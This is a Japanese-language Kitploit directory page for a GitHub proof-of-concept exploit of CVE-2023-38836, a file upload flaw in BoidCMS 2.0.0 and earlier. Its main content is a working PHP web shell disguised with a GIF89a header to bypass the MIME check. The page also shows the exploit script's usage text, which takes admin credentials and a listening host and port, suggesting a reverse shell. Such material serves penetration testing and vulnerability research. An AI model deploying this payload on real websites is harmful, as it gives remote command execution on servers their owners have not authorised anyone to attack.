Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-38836 — BoidCMS バージョン <=2.0.0 におけるファイルアップロード脆弱性の PoC エクスプロイト | Kitploit
ツール/GitHubGitHub/1337kid/cve-2023-38836
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHub1337kid/cve-2023-38836

CVE-2023-38836

BoidCMS バージョン <=2.0.0 におけるファイルアップロード脆弱性の PoC エクスプロイト

リポジトリを見る
512年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-38836 エクスプロイト

BoidCMS v.2.0.0 のファイルアップロード脆弱性により、認証された攻撃者が危険なタイプ (CWE-434) のファイルをアップロードできます。
エクスプロイトするには、攻撃者は GIF ヘッダーを追加して MIME タイプチェックをバイパスできます。

root@kitploit:~
GIF89a;
<?php system($_GET["cmd"]); ?>

使用方法

root@kitploit:~
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -U USER, --user USER  admin username
  -P PASSWD, --passwd PASSWD
                        admin password
  -l LHOST, --lhost LHOST
                        listening host
  -p LPORT, --lport LPORT
                        listening port

ツールをダウンロード